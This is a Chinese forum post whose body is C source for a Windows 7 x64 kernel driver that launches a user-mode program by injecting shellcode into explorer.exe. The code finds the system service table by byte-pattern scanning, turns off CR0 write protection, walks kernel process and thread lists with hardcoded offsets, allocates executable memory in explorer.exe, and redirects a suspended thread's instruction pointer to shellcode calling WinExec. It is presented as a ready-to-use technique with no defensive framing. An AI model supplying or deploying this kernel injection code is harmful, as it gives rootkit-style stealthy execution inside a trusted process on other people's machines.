如何从Windows内核中启动一个R3的程序

[复制链接]
转发
woaidaima2016

该用户从未签到

2380

主题

2433

帖子

9139

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
9139
QQ
跳转到指定楼层
楼主
发表于 2022-4-15 20:08:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

想要查看内容赶紧注册登陆吧!

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
  1. /*
  2. win7x64下 WinExec执行程序,通过把shellcode注入到explorer.exe进程中
  3. 使用方法
  4. #include <inject_shellcode.h>
  5. Ring0Win7X64WinExec();
  6. */
  7. #define PS_CROSS_THREAD_FLAGS_SYSTEM 0x00000010UL

  9. char* path = "D:\\msxboxtest.exe"; //要执行的程序,路劲大小不要超过40字节

  11. typedef struct _SYSTEM_SERVICE_TABLE{
  12.         PVOID                  ServiceTableBase;
  13.         PVOID                  ServiceCounterTableBase;
  14.         ULONGLONG          NumberOfServices;
  15.         PVOID                  ParamTableBase;
  16. } SYSTEM_SERVICE_TABLE, *PSYSTEM_SERVICE_TABLE;

  18. typedef
  19. NTSTATUS
  20. (__stdcall *
  21. pfnZwSuspendThread)(
  22. IN HANDLE ThreadHandle,
  23. OUT PULONG PreviousSuspendCount OPTIONAL
  24. );

  26. typedef
  27. NTSTATUS
  28. (__stdcall *
  29. pfnZwSuspendThread)(
  30. IN HANDLE ThreadHandle,
  31. OUT PULONG PreviousSuspendCount OPTIONAL
  32. );

  34. typedef struct _LDR_DATA_TABLE_ENTRY {
  35.     PVOID Reserved1[2];
  36.     LIST_ENTRY InMemoryOrderLinks;
  37.     PVOID Reserved2[2];
  38.     PVOID DllBase;
  39.     PVOID EntryPoint;
  40.     PVOID Reserved3;
  41.     UNICODE_STRING FullDllName;
  42.     BYTE Reserved4[8];
  43.     PVOID Reserved5[3];
  44.     union {
  45.         ULONG CheckSum;
  46.         PVOID Reserved6;
  47.     };
  48.     ULONG TimeDateStamp;
  49. } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;



  53. PSYSTEM_SERVICE_TABLE KeServiceDescriptorTable;
  54. pfnZwSuspendThread KeSuspendThread = NULL;
  55. pfnZwSuspendThread KeResumeThread = NULL;
  56. ULONGLONG PsSuspendThreadAddr = 0;
  57. ULONGLONG g_WinExec;
  58. //PUCHAR ShellCode="\x50\x48\xC7\xC0\x50\x8D\x0C\x77\x48\x8D\x0D\x95\x11\x00\x00\xBA\x05\x00\x00\x00\xFF\xD0\x58\xE9\x78\x56\x34\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

  60. /*
  61. 000000013F7F1020  50                    push        rax
  62. 000000013F7F1021  48 C7 C0 50 8D 0C 77  mov         rax,0x770C8D50        ; WinExec
  63. 000000013F7F1004  48 8D 0D 95 11 00 00  lea         rcx,[000000013F7F21A0]
  64. 000000013F7F1028  BA 05 00 00 00        mov         edx,0x5
  65. 000000013F7F102D  FF D0                 call        rax
  66. 000000013F7F102F  58                    pop         rax
  67. */
  68. ULONGLONG GetKeServiceDescriptorTable64();
  69. ULONGLONG GetSSDTFuncCurAddr(ULONG id);
  70. VOID GetKeResumeThreadAddr();
  71. VOID GetPsSuspendThreadAddr();
  72. VOID GetKeSuspendThreadAddr();
  73. ULONGLONG SearchApiWin7x64();
  74. ULONGLONG GetKeServiceDescriptorTable64();
  75. void WPOFFx64();
  76. void WPONx64();
  77. VOID InjectShellCode(PETHREAD pThread,PEPROCESS pProcess);
  78. BOOLEAN Inject(char* strProc, int len);
  79. VOID Ring0Win7X64WinExec();

  81. typedef struct WorkItemContext{
  82.     PWORK_QUEUE_ITEM Item;
  83.     HANDLE Pid;
  84. }WorkItemContext;



  88. ULONGLONG GetKeServiceDescriptorTable64() //我的方法
  89. {
  90.         PUCHAR StartSearchAddress = (PUCHAR)__readmsr(0xC0000082);
  91.         PUCHAR EndSearchAddress = StartSearchAddress + 0x500;
  92.         PUCHAR i = NULL;
  93.         UCHAR b1 = 0, b2 = 0, b3 = 0;
  94.         ULONG templong = 0;
  95.         ULONGLONG addr = 0;
  96.         for (i = StartSearchAddress; i<EndSearchAddress; i++)
  97.         {
  98.                 if (MmIsAddressValid(i) && MmIsAddressValid(i + 1) && MmIsAddressValid(i + 2))
  99.                 {
  100.                         b1 = *i;
  101.                         b2 = *(i + 1);
  102.                         b3 = *(i + 2);
  103.                         if (b1 == 0x4c && b2 == 0x8d && b3 == 0x15) //4c8d15
  104.                         {
  105.                                 memcpy(&templong, i + 3, 4);
  106.                                 addr = (ULONGLONG)templong + (ULONGLONG)i + 7;
  107.                                 return addr;
  108.                         }
  109.                 }
  110.         }
  111.         return 0;
  112. }


  115. /*
  116. ULONGLONG GetKeServiceDescriptorTable64()
  117. {
  118.         char KiSystemServiceStart_pattern[13] = "\x8B\xF8\xC1\xEF\x07\x83\xE7\x20\x25\xFF\x0F\x00\x00";        
  119.         ULONGLONG CodeScanStart = (ULONGLONG)&_strnicmp;
  120.         ULONGLONG CodeScanEnd = (ULONGLONG)&KdDebuggerNotPresent;
  121.         UNICODE_STRING Symbol;
  122.         ULONGLONG i, tbl_address, b;
  123.         for (i = 0; i < CodeScanEnd - CodeScanStart; i++)
  124.         {
  125.                 if (!memcmp((char*)(ULONGLONG)CodeScanStart +i, (char*)KiSystemServiceStart_pattern,13))
  126.                 {
  127.                         for (b = 0; b < 50; b++)
  128.                         {
  129.                                 tbl_address = ((ULONGLONG)CodeScanStart+i+b);
  130.                                 if (*(USHORT*) ((ULONGLONG)tbl_address ) == (USHORT)0x8d4c)
  131.                                         return ((LONGLONG)tbl_address +7) + *(LONG*)(tbl_address +3);
  132.                         }
  133.                 }
  134.         }
  135.         return 0;
  136. }

  138. */

  140. ULONGLONG GetSSDTFuncCurAddr(ULONG id)
  141. {
  142.         LONG dwtmp=0;
  143.         PULONG ServiceTableBase=NULL;
  144.         KeServiceDescriptorTable = (PSYSTEM_SERVICE_TABLE)GetKeServiceDescriptorTable64();
  145.         DbgPrint("KeServiceDescriptorTable addr:%llx", KeServiceDescriptorTable);
  146.         if (KeServiceDescriptorTable == 0)
  147.         {
  148.                 return 0;
  149.         }
  150.         ServiceTableBase=(PULONG)KeServiceDescriptorTable->ServiceTableBase;
  151.         dwtmp=ServiceTableBase[id];
  152.         dwtmp=dwtmp>>4;
  153.         return (LONGLONG)dwtmp + (ULONGLONG)ServiceTableBase;
  154. }

  156. VOID GetKeResumeThreadAddr()
  157. {
  158.         ULONG32 callcode=0;
  159.         ULONG64 AddressOfPspTTBP=0,AddressOfPsTST=0,i=0; //保存导出PsSuspendThread函数的地址
  160.         ULONG64 AddressOfPsTSTHigh32=0;
  161.         UNICODE_STRING UniCodeFunctionName;
  162.         AddressOfPsTST=GetSSDTFuncCurAddr(79);
  163.         if (AddressOfPsTST == 0)
  164.         {
  165.                 return;
  166.         }

  168.         
  169.         DbgPrint("NtResumeThread:%llx\n",AddressOfPsTST);
  170.         if(KeResumeThread==NULL)
  171.         {
  172.                 if(AddressOfPsTST==0)
  173.                         return;

  175.                 //根据特征码寻找 特征码 01 e8
  176.                 for(i=1;i<0xff;i++)
  177.                 {
  178.                         if(MmIsAddressValid((PVOID)(AddressOfPsTST+i))!=FALSE)
  179.                         {
  180.                                 if(*(BYTE *)(AddressOfPsTST+i)==0x60 && *(BYTE *)(AddressOfPsTST+i+1)==0xe8) //目标地址-原始地址-5=机器码 ==> 目标地址=机器码+5+原始地址
  181.                                 {
  182.                                         DbgPrint("AddressOfPsTST+i:%llx\n",AddressOfPsTST+i);
  183.                                         RtlMoveMemory(&callcode,(PVOID)(AddressOfPsTST+i+2),4);
  184.                                         AddressOfPsTSTHigh32=AddressOfPsTST&0xFFFFFFFF00000000;
  185.                                         AddressOfPspTTBP=(ULONG64)(callcode + 5 + (ULONG32)AddressOfPsTST+i+1)+AddressOfPsTSTHigh32;
  186.                                         break;
  187.                                 }
  188.                         }
  189.                 }
  190.                 KeResumeThread=(pfnZwSuspendThread)AddressOfPspTTBP;
  191.                 DbgPrint("KeResumeThreadAddr:%llx\n",KeResumeThread);
  192.         
  193.         }

  195. }

  197. VOID GetPsSuspendThreadAddr()
  198. {
  199.         ULONG32 callcode=0;
  200.         ULONG64 AddressOfPspTTBP=0,AddressOfPsTST=0,i=0; //保存导出PsSuspendThread函数的地址
  201.         ULONG64 AddressOfPsTSTHigh32=0;
  202.         UNICODE_STRING UniCodeFunctionName;
  203.         AddressOfPsTST=GetSSDTFuncCurAddr(379);
  204.         if (AddressOfPsTST == 0)
  205.         {
  206.                 return;
  207.         }

  209.         
  210.         DbgPrint("NtSuspendThread:%llx\n",AddressOfPsTST);
  211.         if(PsSuspendThreadAddr==0)
  212.         {
  213.                 if(AddressOfPsTST==0)
  214.                         return;

  216.                 //根据特征码寻找 特征码 01 e8
  217.                 for(i=1;i<0xff;i++)
  218.                 {
  219.                         if(MmIsAddressValid((PVOID)(AddressOfPsTST+i))!=FALSE)
  220.                         {
  221.                                 if(*(BYTE *)(AddressOfPsTST+i)==0x68 && *(BYTE *)(AddressOfPsTST+i+1)==0xe8) //目标地址-原始地址-5=机器码 ==> 目标地址=机器码+5+原始地址
  222.                                 {
  223.                                         DbgPrint("AddressOfPsTST+i:%llx\n",AddressOfPsTST+i);
  224.                                         RtlMoveMemory(&callcode,(PVOID)(AddressOfPsTST+i+2),4);
  225.                                         AddressOfPsTSTHigh32=AddressOfPsTST&0xFFFFFFFF00000000;
  226.                                         AddressOfPspTTBP=(ULONG64)(callcode + 5 + (ULONG32)AddressOfPsTST+i+1)+AddressOfPsTSTHigh32;
  227.                                         break;
  228.                                 }
  229.                         }
  230.                 }
  231.                 PsSuspendThreadAddr=AddressOfPspTTBP;
  232.                 DbgPrint("PsSuspendThreadAddr:%llx\n",PsSuspendThreadAddr);
  233.         
  234.         }

  236. }

  238. VOID GetKeSuspendThreadAddr()
  239. {
  240.         ULONG64 PspExitThread=0;
  241.         ULONG32 callcode=0;
  242.         ULONG64 AddressOfPsTSTHigh32=0; //用于保存地址的高32位
  243.         
  244.         ULONG64 AddressOfPspTTBP=0,AddressOfPsTST=0,i=0; //保存导出PsTerminateSystemThread函数的地址
  245.         AddressOfPsTST=(ULONG64)PsSuspendThreadAddr;
  246.         DbgPrint("PsSuspendThreadAddr:%llx\n",AddressOfPsTST);
  247.         if(KeSuspendThread==NULL)
  248.         {
  249.                 if(AddressOfPsTST==0)
  250.                         return;

  252.                 //根据特征码寻找 特征码 8b cd e8
  253.                 for(i=1;i<0xff;i++)
  254.                 {
  255.                         if(MmIsAddressValid((PVOID)(AddressOfPsTST+i))!=FALSE)
  256.                         {
  257.                                 if(*(BYTE *)(AddressOfPsTST+i)==0x8b && *(BYTE *)(AddressOfPsTST+i+1)==0xce && *(BYTE *)(AddressOfPsTST+i+2)==0xe8) //目标地址-原始地址-5=机器码 ==> 目标地址=机器码+5+原始地址
  258.                                 {
  259.                                         RtlMoveMemory(&callcode,(PVOID)(AddressOfPsTST+i+3),4);
  260.                                         DbgPrint("callcode:%llx\n",(ULONG64)callcode);
  261.                                         AddressOfPsTSTHigh32=AddressOfPsTST&0xFFFFFFFF00000000;
  262.                                         AddressOfPspTTBP=(ULONG64)(callcode + 5 + (ULONG32)AddressOfPsTST+i+2)+AddressOfPsTSTHigh32;
  263.                                         break;
  264.                                 }
  265.                         }
  266.                 }
  267.                 KeSuspendThread=(pfnZwSuspendThread)AddressOfPspTTBP;
  268.                 DbgPrint("KeSuspendThread:%llx\n",KeSuspendThread);
  269.         
  270.         }

  272. }

  274. ULONGLONG SearchApiWin7x64()
  275. {
  276.     PPEB peb = NULL;
  277.         PUCHAR lpname = NULL;
  278.         ULONGLONG peb_ldr_data;
  279.         ULONGLONG ModuleList;
  280.         ULONGLONG dllbase;
  281.         ULONGLONG exe_header;
  282.         ULONGLONG MyOptionalHeader;
  283.         ULONG OutputRva;
  284.         ULONG MyAddressOfNames;
  285.         ULONG MyVirtualAddressVal;
  286.         ULONG AddrOfNamesRva;
  287.         ULONG myFunRva;
  288.         ULONG NumberOfNames;
  289.         ULONGLONG FuncAddr;
  290.         ULONG AddrOfFuncsRva;
  291.         ULONGLONG WinExecAddr;
  292.         ULONG WinExecAddrRva;
  293.         PSTR myFun;
  294.         PLDR_DATA_TABLE_ENTRY data = NULL;
  295.         UNICODE_STRING sFullDllName;
  296.                
  297.         PEPROCESS pSystemProcess = PsGetCurrentProcess();
  298.         PLIST_ENTRY pCurrentList = (PLIST_ENTRY)((PUCHAR)pSystemProcess + 0x188); //ActiveProcessLinks
  299.     PLIST_ENTRY pTempList = pCurrentList;
  300.     PEPROCESS pEProcess = NULL;
  301.         do{
  302.                
  303.                 pEProcess = (PEPROCESS)((PUCHAR)pTempList - 0x188);
  304.                 peb = (PPEB)(*(PULONGLONG)((PUCHAR)pEProcess + 0x338));  //peb
  305.                 lpname = (PUCHAR)pEProcess + 0x2e0; // ImageFileName
  306.                 //DbgPrint("process %s\n", lpname);
  307.                 if((peb != NULL)&&(_strnicmp(lpname, "explorer.exe", 8) == 0)) //找到进程 explorer.exe
  308.                 {
  309.                         PKAPC_STATE pKs = (PKAPC_STATE)ExAllocatePool(NonPagedPool, sizeof(PKAPC_STATE));
  310.                         DbgPrint("process %s\n", lpname);
  311.                         KeStackAttachProcess((PKPROCESS)pEProcess,pKs);
  312.                         
  313.                         peb_ldr_data  = *(PULONGLONG)((PUCHAR)peb+0x018);
  314.                         DbgPrint("peb_ldr_data: %llx\n", peb_ldr_data);        
  315.                         ModuleList = *(PULONGLONG)((PUCHAR)peb_ldr_data+0x030);
  316.                         data = (PLDR_DATA_TABLE_ENTRY)((PUCHAR)ModuleList-0x020);
  317.                         sFullDllName= data->FullDllName;
  318.                         //找到kernel32.dll
  319.                         while(wcsstr(sFullDllName.Buffer,L"kernel32.dll") == NULL)
  320.                         {
  321.                                 ModuleList =*(PULONGLONG) ModuleList; //取下一个模块
  322.                                 data = (PLDR_DATA_TABLE_ENTRY)((PUCHAR)ModuleList-0x020);
  323.                                 sFullDllName= data->FullDllName;
  324.                         }
  325.                         data = (PLDR_DATA_TABLE_ENTRY)((PUCHAR)ModuleList-0x020); //此时的data为kernel32.dll对应的LDR_DATA_TABLE_ENTRY结构体
  326.                         sFullDllName= data->FullDllName;
  327.                         
  328.                         dllbase = *(PULONGLONG)((PUCHAR)data+0x030);
  329.                         DbgPrint("dllbase:%llx\n",dllbase);
  330.                         
  331.                         exe_header = dllbase+(*(PULONG)(dllbase+0x3c));  //PE header
  332.                         DbgPrint("exe_header:%llx\n",exe_header);
  333.                         
  334.                         MyOptionalHeader=exe_header+0x018;
  335.                         
  336.                         DbgPrint("MyOptionalHeader:%llx\n",MyOptionalHeader);
  337.                         
  338.                         MyVirtualAddressVal = *(PULONG)(MyOptionalHeader+0x070); //VirtualAddressVal的值
  339.                         
  340.                         DbgPrint("MyVirtualAddressVal:%x\n",MyVirtualAddressVal);
  341.                         
  342.                         NumberOfNames = *(PULONG)(MyVirtualAddressVal + dllbase + 0x18); //函数的数量
  343.                         
  344.                         AddrOfFuncsRva = *(PULONG)(MyVirtualAddressVal + dllbase + 0x1c); //AddrOfFuns的rva
  345.                         
  346.                         WinExecAddrRva = *(PULONG)(AddrOfFuncsRva+dllbase+(0x528-0x1)*4); //winexec偏移地址
  347.                         
  348.                         DbgPrint("WinExecAddrRva:%x\n",WinExecAddrRva);
  349.                         
  350.                         WinExecAddr =WinExecAddrRva+dllbase; //winexec地址
  351.                         
  352.                         DbgPrint("WinExecAddr:%llx\n",WinExecAddr);                                
  353.                         
  354.                         //以下是获取第一个函数名字代码
  355.                         /*
  356.                         AddrOfNamesRva=*(PULONG)((ULONGLONG)MyVirtualAddressVal + dllbase + 0x20); //AddrOfNames的偏移地址
  357.                         
  358.                         DbgPrint("AddrOfNamesRva:%x\n",AddrOfNamesRva);
  359.                         
  360.                         myFunRva = *(PULONG)((ULONGLONG)AddrOfNamesRva + dllbase); //函数名字的偏移地址
  361.                         
  362.                         myFun = (PSTR)((ULONGLONG)myFunRva + dllbase ); //函数名字的地址
  363.                         
  364.                         DbgPrint("myFun:%s\n",myFun);
  365.                         */
  366.                                 
  367.                         KeUnstackDetachProcess(pKs);
  368.                         
  369.                         
  370.                         
  371.                         
  372.                 }
  373.                 pTempList = pTempList->Flink;//下一个活动的进程

  375.         } while(pCurrentList != pTempList);
  376.         
  377.         return WinExecAddr;
  378. }

  380. void WPOFFx64()
  381. {
  382.         UINT64 cr0=__readcr0();
  383.         cr0 &= 0xfffffffffffeffff;
  384.         __writecr0(cr0);
  385.         _disable();
  386. }

  388. //打开写保护
  389. void WPONx64()
  390. {
  391.         UINT64 cr0=__readcr0();
  392.         cr0 |= 0x10000;
  393.         _enable();
  394.         __writecr0(cr0);
  395. }

  397. VOID InjectShellCode(PETHREAD pThread,PEPROCESS pProcess)
  398. {
  399.         ULONGLONG i;
  400.         ULONGLONG startaddr;
  401.         PKTRAP_FRAME pTrapFrame;
  402.         ULONG jmpOffset;
  403.         PCLIENT_ID  pCid;
  404.         OBJECT_ATTRIBUTES oa;
  405.         HANDLE hProcess;
  406.         NTSTATUS ntstatus;
  407.         PVOID lpTargetPath = NULL;
  408.         ULONGLONG pathAddr;
  409.         ULONGLONG patht;
  410.         ULONG offAddr;
  411.         KIRQL irql;
  412.         int len;
  413.         PUCHAR ShellCode_Const = "\x50\x48\xC7\xC0\x50\x8D\x0C\x77\x48\x8D\x0D\x95\x11\x00\x00\xBA\x05\x00\x00\x00\xFF\xD0\x58\xE9\x78\x56\x34\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
  414.     PUCHAR ShellCode = ExAllocatePool(PagedPool, 72);
  415.         RtlMoveMemory(ShellCode, ShellCode_Const, 72);
  416.         
  417.         DbgBreakPoint();

  419.         DbgPrint("Inject Start\n");
  420.         
  421.         
  422.         __try {
  423.                 KeSuspendThread(pThread, NULL);
  424.         }
  425.         __except(1) {
  426.                 return;
  427.         }
  428.         
  429.         // PTrapFrame中就是该线程的各个寄存器的值
  430.         pTrapFrame = *(PKTRAP_FRAME*)((ULONGLONG)pThread + 0x1d8);
  431.         //如果
  432.         if (pTrapFrame == 0)
  433.         {
  434.                 return;
  435.         }

  437.         DbgPrint("pTrapFrame:%llx\n",pTrapFrame);        
  438.         DbgPrint("ShellCode addr:%llx\n",ShellCode);
  439.         startaddr = (ULONGLONG)ShellCode;

  441.         
  442.   

  444.   
  445.   WPOFFx64();
  446.   RtlCopyMemory((PUCHAR)startaddr + 4, &g_WinExec, 4);    //填写winexec地址
  447.   
  448.   lpTargetPath = (PVOID)((ULONGLONG)startaddr + 32);
  449.   memset(lpTargetPath, 0, 40);
  450.   DbgPrint("path len:%d\n",strlen(path));
  451.   DbgPrint("path addr: %llx\n",path);
  452.   pathAddr = ((ULONGLONG)startaddr + 40);
  453.   offAddr = (ULONG)(pathAddr-startaddr-15);
  454.   RtlCopyMemory((PVOID)((PUCHAR)startaddr + 40), path, 32); //拷贝path字符串到shellcode中
  455.   RtlCopyMemory((PUCHAR)startaddr + 11, &offAddr, 4); //拷贝偏移量到shellcode中
  456.   
  457.   WPONx64();
  458.   

  460.   
  461.   // 下面的代码是分配空间来放置ShellCode
  462.   InitializeObjectAttributes(&oa,0,0,0,0);
  463.   pCid = (CLIENT_ID*)((ULONGLONG)pThread + 0x3b8);
  464.   ntstatus = ZwOpenProcess(
  465.     &hProcess,
  466.     PROCESS_ALL_ACCESS,
  467.     &oa,
  468.     pCid
  469.     );
  470.   if ( NT_SUCCESS(ntstatus) )
  471.   {
  472.         PVOID pBuff = NULL;
  473.     SIZE_T size = 0x64;
  474.     ntstatus = ZwAllocateVirtualMemory(
  475.       hProcess,
  476.       &pBuff,
  477.       0,
  478.       &size,
  479.       MEM_RESERVE | MEM_COMMIT,
  480.       PAGE_EXECUTE_READWRITE
  481.       );
  482.         if( NT_SUCCESS(ntstatus) )
  483.         {
  484.           KAPC_STATE kapc;
  485.       // 拷贝ShellCode到目标进程中去
  486.       KeStackAttachProcess((PRKPROCESS)pProcess,&kapc);
  487.           //设置jmp 原rip
  488.           DbgPrint("buf addr:%llx\n",pBuff);
  489.           DbgPrint("Rip:%llx]n",(ULONGLONG)pTrapFrame->Rip);
  490.           jmpOffset=(ULONG)(((ULONG)pTrapFrame->Rip)-(ULONG)pBuff-0x1c);
  491.           for( i = startaddr; i <= startaddr + 0x72; ++i ) {
  492.                 if( MmIsAddressValid((PVOID)i) && MmIsAddressValid((PVOID)(i+7)) ){
  493.                         if ( *(PULONG)i == 0x12345678 )
  494.                         {
  495.                                 DbgPrint("find modify point\n");
  496.                                 WPOFFx64();
  497.                                 *(PULONG)i = jmpOffset;//修改跳转地址,执行完shellcode跳到原Rip
  498.                                 WPONx64();
  499.                                 break;
  500.                         }
  501.         }
  502.       }
  503.   
  504.           RtlCopyMemory(pBuff,ShellCode,72);//拷贝ShellCode过去
  505.   
  506.       KeUnstackDetachProcess (&kapc);
  507.       // pTrapFrame->Eip指向ShellCode
  508.           DbgPrint("buf addr:%llx\n",pBuff);
  509.       pTrapFrame->Rip = (ULONGLONG)pBuff;
  510.          
  511.         }
  512.         ZwClose(hProcess);
  513.   }
  514.   KeResumeThread(pThread, NULL);
  515.   DbgPrint("Inject End\n");
  516. }

  518. BOOLEAN Inject(char* strProc, int len)
  519. {
  520.         PPEB peb = NULL;
  521.         PUCHAR lpname = NULL;
  522.         PEPROCESS pProcess;
  523.         PETHREAD pThread;
  524.         PLIST_ENTRY pListHead, pNextEntry;
  525.         PLIST_ENTRY pThListHead, pThNextEntry;
  526.         UCHAR SuspendCount;
  527.         ULONG CrossThreadFlags;
  528.         pProcess = PsGetCurrentProcess();
  529.         pListHead = (PLIST_ENTRY)((PUCHAR)pProcess + 0x188);  //win7x64下是188 //ActiveProcessLinks
  530.         pNextEntry = pListHead;
  531.         do
  532.         {
  533.                 pProcess = (PEPROCESS)((ULONGLONG)pNextEntry - 0x188);
  534.                 peb = (PPEB)(*(PULONGLONG)((PUCHAR)pProcess + 0x338));  //peb
  535.                 lpname = (PUCHAR)pProcess + 0x2e0; // ImageFileName
  536.                 DbgPrint("process %s\n", lpname);
  537.                
  538.                 //if( !_strnicmp((char*)pProcess + 0x2e0, strProc, len) )
  539.                 if( !_strnicmp(lpname, strProc, len) )
  540.                 {
  541.                         DbgPrint("find process\n");
  542.                         pThListHead = (PLIST_ENTRY)((ULONGLONG)pProcess + 0x308);
  543.                         pThNextEntry = pThListHead->Flink;
  544.                         while ( pThNextEntry != pThListHead)
  545.                         {
  546.                                 //查找符合条件的线程
  547.                                 pThread = (PETHREAD)((ULONGLONG)pThNextEntry - 0x428);
  548.                                 SuspendCount = *(PUCHAR)((ULONGLONG)pThread + 0x26c);
  549.                                 CrossThreadFlags = *(PULONG)((ULONGLONG)pThread + 0x450);
  550.                                 if( !SuspendCount && (CrossThreadFlags & PS_CROSS_THREAD_FLAGS_SYSTEM) == 0 )
  551.                                 {
  552.                                         //非Suspen,非退出,非内核
  553.                                         DbgPrint("find thread\n");
  554.                                         DbgPrint("pThread addr:%llx\n",pThread);
  555.                                         InjectShellCode(pThread,pProcess);
  556.                                         return TRUE;
  557.                                         break;
  558.                                 }
  559.                                 pThNextEntry = pThNextEntry->Flink;
  560.                                 
  561.                         }
  562.                         break;
  563.                 }
  564.                 pNextEntry = pNextEntry->Flink;
  565.         } while(pNextEntry != pListHead);
  566.         return FALSE;
  567. }

  569. VOID Ring0Win7X64WinExec()
  570. {
  571.     //得到KeSuspendThreadAddr地址
  572.         GetPsSuspendThreadAddr();
  573.         GetKeSuspendThreadAddr();
  574.         
  575.         //得到KeResumeThread地址
  576.         GetKeResumeThreadAddr();
  577.         
  578.         //获取WinExec地址
  579.         g_WinExec = SearchApiWin7x64();
  580.         
  581.         Inject("explorer.exe",8);

  583. }
复制代码


分享到:  QQ好友和群QQ好友和群
收藏收藏
回复

使用道具 举报

快速回复高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表